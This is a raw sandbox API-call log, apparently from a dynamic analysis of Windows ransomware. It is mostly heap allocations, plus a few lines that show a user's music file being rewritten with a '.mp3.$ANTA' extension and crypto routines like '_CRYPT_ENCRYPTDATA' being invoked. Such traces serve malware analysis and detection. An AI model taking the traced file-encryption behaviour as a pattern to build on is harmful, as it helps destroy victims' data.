RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2760 [0116.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0116.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a48 [0116.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0116.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb0) returned 0x42d9888 [0116.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0116.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a46a0 [0116.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0116.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4728 [0116.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x42d9888 | out: hHeap=0x1780000) returned 1 [0116.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0116.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0116.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0116.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a48 | out: hHeap=0x1780000) returned 1 [0116.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0116.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a46a0 | out: hHeap=0x1780000) returned 1 [0116.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0116.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0116.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0116.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0116.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a48c0 [0116.859] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\-a1fx91set 48t")) returned 0x10 [0116.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a48c0 | out: hHeap=0x1780000) returned 1 [0116.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0116.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4728 | out: hHeap=0x1780000) returned 1 [0116.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0116.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0116.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0116.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0116.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0116.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0116.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27a0 [0116.860] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\RjvHKIDt9\\evi6Nl1 g1KyY\\-a1fx91SeT 48T\\mzZHZq983SYlb.mp3.$ANTA" (normalized: "c:\\users\\fd1hvy\\music\\rjvhkidt9\\evi6nl1 g1kyy\\-a1fx91set 48t\\mzzhzq983sylb.mp3.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0116.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0116.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0116.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0116.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0116.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0116.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0116.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0116.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0116.860] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0116.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0116.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0116.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0116.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0116.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0116.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0116.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0116.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0116.861] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac740 | out: hHeap=0x1780000) returned 1 [0116.861] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0116.861] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0116.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0116.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0116.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0116.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0116.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0116.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0116.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0116.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0116.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ec8 | out: hHeap=0x1780000) returned 1 [0116.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27c0 | out: hHeap=0x1780000) returned 1 [0116.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0116.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0116.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0116.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0116.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e09020 [0116.864] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0116.864] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144e820*=0x708a, lpOverlapped=0x0) returned 1 [0116.866] ReadFile (in: hFile=0x298, lpBuffer=0x43eaa90, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eaa90*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0116.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0116.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0116.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0116.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0116.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x708a) returned 0x4516010 [0116.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e09020 | out: hHeap=0x1780000) returned 1 [0116.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0116.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0116.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0116.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0116.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0116.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x708a) returned 0x451d0a8 [0116.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0116.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0116.869] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0116.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0116.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0116.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0116.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0116.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x708a) returned 0x4516010 [0116.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0116.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0116.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0116.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0116.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0116.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0116.869] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0116.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0116.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0116.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0116.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0116.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0116.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41abfc0 [0116.869] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0116.869] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0116.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0116.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ea8 [0116.870] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0116.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ea8 | out: hHeap=0x1780000) returned 1 [0116.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0116.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0116.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2780 [0116.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0116.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0116.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0116.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0116.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x708a) returned 0x4516010 [0116.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0116.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2760 [0116.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca850 [0116.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0116.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0116.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27b0 [0116.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca898 [0116.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0116.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0116.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2880 [0116.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0116.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28a0 [0116.870] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28a0 | out: hHeap=0x1780000) returned 1 [0116.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caca0 [0116.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0116.870] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0116.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28a0 [0116.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0116.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0116.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x708a) returned 0x4524140 [0116.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0116.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0116.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28c0 [0116.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0116.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0116.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0116.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0116.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0116.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0116.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0116.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0116.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0116.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0116.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0116.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0116.871] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0116.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0116.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0116.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0116.871] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0116.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac000 [0116.871] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0116.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0116.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0116.871] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0116.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0116.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0116.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0116.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0116.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0116.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0116.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0116.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0116.872] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0116.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0116.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0116.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0116.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2920 [0116.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0116.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0116.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0116.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0116.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabf8 [0116.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0508 [0116.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0116.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0116.872] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0116.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0710 [0116.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0116.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0116.872] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0116.872] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d06c0 [0116.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0116.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0116.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0116.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0116.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0116.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0116.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d04e0 [0116.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0116.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0116.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0116.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0116.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f48 [0116.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0116.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0116.873] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0116.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0116.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0116.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0116.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0116.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0116.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0116.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0116.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0116.873] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0116.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0116.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0116.873] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0116.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0116.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0116.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0116.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0116.874] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0116.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0116.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0116.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0116.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0116.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d04e0 | out: hHeap=0x1780000) returned 1 [0116.874] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0116.874] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0116.874] 